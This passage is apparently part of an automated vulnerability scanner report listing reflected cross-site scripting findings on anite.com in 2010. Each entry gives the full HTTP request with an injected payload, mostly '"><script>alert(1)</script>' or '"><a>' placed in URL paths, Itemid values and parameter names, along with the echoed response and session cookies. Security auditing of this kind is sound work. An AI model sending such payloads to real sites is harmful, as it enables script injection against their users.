<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/8325d"><script>alert(1)</script>1b36e4467e3#up">
...[SNIP]...

1.235. http://anite.com/travel-technology-solutions-anite-plc-3.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/travel-technology-solutions-anite-plc-3.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69f00"><a>1744dee6845 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /travel-technology-solutions-anite-plc-3.html?69f00"><a>1744dee6845=1 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 200 OK
Date: Thu, 25 Nov 2010 15:13:15 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:13:15 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/travel-technology-solutions-anite-plc-3.html?69f00"><a>1744dee6845=1#up">
...[SNIP]...

1.236. http://anite.com/wireless-customers-a-partners.html [Itemid parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/wireless-customers-a-partners.html

Issue detail

The value of the Itemid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload af1ef"><a>9aaf5778615 was submitted in the Itemid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /wireless-customers-a-partners.html?Itemid=214af1ef"><a>9aaf5778615 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 200 OK
Date: Thu, 25 Nov 2010 15:11:26 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:11:26 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/wireless-customers-a-partners.html?Itemid=214af1ef"><a>9aaf5778615#up">
...[SNIP]...

1.237. http://anite.com/wireless-customers-a-partners.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://anite.com
Path:	/wireless-customers-a-partners.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 90dde"><script>alert(1)</script>d14745124d6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /90dde"><script>alert(1)</script>d14745124d6 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 404 NOT FOUND
Date: Thu, 25 Nov 2010 15:11:39 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:11:39 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/90dde"><script>alert(1)</script>d14745124d6#up">
...[SNIP]...

1.238. http://anite.com/wireless-customers-a-partners.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/wireless-customers-a-partners.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5de37"><a>5a727714ec0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /wireless-customers-a-partners.html?5de37"><a>5a727714ec0=1 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 200 OK
Date: Thu, 25 Nov 2010 15:11:16 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:11:17 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/wireless-customers-a-partners.html?5de37"><a>5a727714ec0=1#up">
...[SNIP]...

1.239. http://anite.com/wireless-enquiry-form.html [Itemid parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/wireless-enquiry-form.html

Issue detail

The value of the Itemid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 79185"><a>3beac5e143d was submitted in the Itemid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /wireless-enquiry-form.html?Itemid=40179185"><a>3beac5e143d HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 200 OK
Date: Thu, 25 Nov 2010 15:11:44 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:11:45 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/wireless-enquiry-form.html?Itemid=40179185"><a>3beac5e143d#up">
...[SNIP]...

1.240. http://anite.com/wireless-enquiry-form.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://anite.com
Path:	/wireless-enquiry-form.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 750fd"><script>alert(1)</script>4d231446340 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /750fd"><script>alert(1)</script>4d231446340 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 404 NOT FOUND
Date: Thu, 25 Nov 2010 15:12:33 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:12:34 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/750fd"><script>alert(1)</script>4d231446340#up">
...[SNIP]...

1.241. http://anite.com/wireless-enquiry-form.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/wireless-enquiry-form.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ae20c"><a>ea5a0d72aa9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /wireless-enquiry-form.html?ae20c"><a>ea5a0d72aa9=1 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 200 OK
Date: Thu, 25 Nov 2010 15:11:38 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:11:38 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/wireless-enquiry-form.html?ae20c"><a>ea5a0d72aa9=1#up">
...[SNIP]...

1.242. http://anite.com/wireless-events.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://anite.com
Path:	/wireless-events.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 85bea"><script>alert(1)</script>afed6320509 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /85bea"><script>alert(1)</script>afed6320509 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 404 NOT FOUND
Date: Thu, 25 Nov 2010 15:11:02 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:11:02 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/85bea"><script>alert(1)</script>afed6320509#up">
...[SNIP]...

1.243. http://anite.com/wireless-events.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/wireless-events.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17456"><a>02782c0b63 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /wireless-events.html?17456"><a>02782c0b63=1 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 404 NOT FOUND
Date: Thu, 25 Nov 2010 15:10:42 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:10:43 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/wireless-events.html?17456"><a>02782c0b63=1#up">
...[SNIP]...

1.244. http://anite.com/wireless-handset-and-network-testing-anite.html [Itemid parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/wireless-handset-and-network-testing-anite.html

Issue detail

The value of the Itemid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6e6fc"><a>4be4b20c0a4 was submitted in the Itemid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /wireless-handset-and-network-testing-anite.html?Itemid=4116e6fc"><a>4be4b20c0a4 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 200 OK
Date: Thu, 25 Nov 2010 15:09:04 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:09:04 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/wireless-handset-and-network-testing-anite.html?Itemid=4116e6fc"><a>4be4b20c0a4#up">
...[SNIP]...

1.245. http://anite.com/wireless-handset-and-network-testing-anite.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://anite.com
Path:	/wireless-handset-and-network-testing-anite.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6816b"><script>alert(1)</script>5abe12bd49b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /6816b"><script>alert(1)</script>5abe12bd49b HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 404 NOT FOUND
Date: Thu, 25 Nov 2010 15:09:17 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:09:17 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/6816b"><script>alert(1)</script>5abe12bd49b#up">
...[SNIP]...

1.246. http://anite.com/wireless-handset-and-network-testing-anite.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/wireless-handset-and-network-testing-anite.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2c9c1"><a>53ff1c97518 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /wireless-handset-and-network-testing-anite.html?2c9c1"><a>53ff1c97518=1 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 200 OK
Date: Thu, 25 Nov 2010 15:08:58 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:08:59 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/wireless-handset-and-network-testing-anite.html?2c9c1"><a>53ff1c97518=1#up">
...[SNIP]...

1.247. http://anite.com/wireless-handset-conformance-testing-anite.html [Itemid parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/wireless-handset-conformance-testing-anite.html

Issue detail

The value of the Itemid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41739"><a>1f01ebe9c9c was submitted in the Itemid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /wireless-handset-conformance-testing-anite.html?Itemid=5841739"><a>1f01ebe9c9c HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 200 OK
Date: Thu, 25 Nov 2010 15:09:23 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:09:23 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/wireless-handset-conformance-testing-anite.html?Itemid=5841739"><a>1f01ebe9c9c#up">
...[SNIP]...

1.248. http://anite.com/wireless-handset-conformance-testing-anite.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://anite.com
Path:	/wireless-handset-conformance-testing-anite.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a715a"><script>alert(1)</script>9492c1497a8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /a715a"><script>alert(1)</script>9492c1497a8 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 404 NOT FOUND
Date: Thu, 25 Nov 2010 15:09:29 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:09:30 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/a715a"><script>alert(1)</script>9492c1497a8#up">
...[SNIP]...

1.249. http://anite.com/wireless-handset-conformance-testing-anite.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/wireless-handset-conformance-testing-anite.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fbb3d"><a>2e5fc7790c3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /wireless-handset-conformance-testing-anite.html?fbb3d"><a>2e5fc7790c3=1 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 200 OK
Date: Thu, 25 Nov 2010 15:09:11 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:09:11 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

